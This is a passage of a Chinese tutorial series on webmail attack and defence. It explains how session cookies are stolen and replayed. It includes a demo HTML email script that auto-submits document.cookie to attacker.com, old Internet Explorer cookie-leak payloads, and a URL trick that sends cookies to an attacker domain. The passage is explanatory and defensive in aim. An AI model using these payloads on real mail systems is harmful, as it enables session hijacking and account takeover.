Webmail攻防实战(6)
2008-02-23 06:16:58来源:互联网 阅读 ()
假如攻击者能够获取用户WebMail的cookie信息,那么就能很容易地侵入用户的WebMail。攻击者如何获取用户WebMail的cookie信息呢?假如攻击者在用户的电脑上安装了木马,或能够从网络线路上对用户进行嗅探侦听,那么获取cookie信息自然不成问题,但是这并不是我们讨论问题的意义所在,因为都能够这样了,又何必大费周折去获取cookie信息,直接获取邮箱密码就是了。
假如WebMail系统存在跨站脚本执行漏洞,那么攻击者就能欺骗用户从而轻易地获取cookie信息,虽然众多网站存在此漏洞,但存在此漏洞的WebMail系统还很少见。
含有恶性脚本程式的html邮件能使攻击者获取WebMail的cookie信息。Html邮件中的脚本程式先提取当前WebMail的cookie信息,然后把他赋值给某个表单元素,再将表单自动提交给攻击者,攻击者从而获得cookie会话信息。下面是一段演示程式:
<body> <formmethod="post"action="http://attacker.com/getcookie.cgi"name="myform"> <inputname="session"type="hidden"> </form> <scriptlanguage="JavaScript"> varcookie=(document.cookie); alert(cookie);//这一句用于显示当前cookie信息,当然,攻击者不会这样做。 document.myform.session.value=cookie; document.myform.submit(); </script> |
getcookie.cgi是放在攻击者web服务器上的一个cgi程式,用于获取表单提交过来的cookie信息,并且做记录或通知攻击者。当然,攻击者会把html邮件、getcookie.cgi程式设计得更隐蔽,更具欺骗性,让用户难以察觉。
通常,浏览器根据web服务器的域名来分别保存cookie信息,并且只会把cookie信息发送给同一域名的web服务器。但是,浏览器的漏洞给攻击者获取不同域名的cookie信息创造了机会,InternetExplorer、Netscape和Mozilla等被广泛使用的浏览器都存在过此类漏洞。下面是几个InternetExplorer浏览器(针对IE5.0、IE5.5或IE6.0)泄漏cookie信息的例子:
(1)Html语言中的object元素用于在当前页面内嵌入外部对象,但InternetExplorer浏览器对object元素属性的处理不当会导致任意域的cookie信息被泄漏,演示代码如下:
<objectid="data"data="empty.html"type="text/html"></object> <script> varref=document.getElementById("data").object; ref.location.href="http://www.anydomain.com"; setTimeout("alert(ref.cookie)",5000); </script> |
(2)InternetExplorer浏览器错误处理“about”协议使得一个精心构造的URL请求可能会显示或修改任意域的cookie信息,例如(以下代码在同一行):
about://www.anydomain.com/<scriptlanguage=JavaScript>alert(document.cookie);</script>
(3)InternetExplorer浏览器会误把URL中“ ”(空格符的URL编码)字符串之前的主机名当做cookie信息所在的域,并且发送出去。假设攻击者有一个域名“attacker.com”,攻击者把他做成泛域名解析,即把“*.attacker.com”指向攻击者web服务器所在的IP地址,“attacker.com”下的任何子域名或主机名都会被解析成这个IP地址,当用户提交了类似下面这样的URL后,浏览器就会把“anydomain.com”域名的cookie信息发送给攻击者:
http://anydomain.com .attacker.com/getcookie.cgi
假如攻击者要获取WebMail的临时型cookie信息,就会在html邮件中写入相应的代码,在用户浏览邮件时,该代码自动执行,使得攻击者能够获取当前浏览器里的临时cookie信息,也能够把用于获取cookie信息的URL发送给用户,诱骗用户打开该URL,这样攻击者也能获取临时cookie信息。
在攻击者获取cookie信息后,假如cookie信息里含有密码等敏感信息,那么攻击者就能很轻易地侵入用户的邮箱,虽然hotmail等WebMail系统曾发生过此类的情况,但cookie信息泄漏敏感信息的WebMail系统还很少见。
攻击者在获取cookie信息之后,还要让此cookie信息由浏览器来存取从而和WebMail系统建立会话,这样才能侵入用户的WebMail。假如是持久型cookie信息,攻击者所要做的是把这个信息复制到自己的cookie文档中去,由浏览器存取该cookie信息从而和WebMail系统建立会话,但是临时cookie信息存储在内存中,并不容易让浏览器存取。
为了让浏览器存取临时cookie信息,攻击者能够编辑内存中的cookie信息,或修改公开源代码的浏览器,让浏览器能够编辑cookie信息,但是这样都不是很简便的方法,简便的方法是使用Achilles程式(packetstormsecurity.org网站有下载)。Achilles是个http代理服务器,能够载取浏览器和web服务器间的http会话信息,并且在代理转发数据之前能够编辑http会话连同临时cookie信息。
WebMail系统应该避免使用持久型cookie会话跟踪,使攻击者在cookie会话攻击上不能轻易得逞。为了防止cookie会话攻击,用户能够采取如下措施以加强安全:
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
上一篇: Webmail攻防实战(5)
下一篇: Webmail攻防实战(7)
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash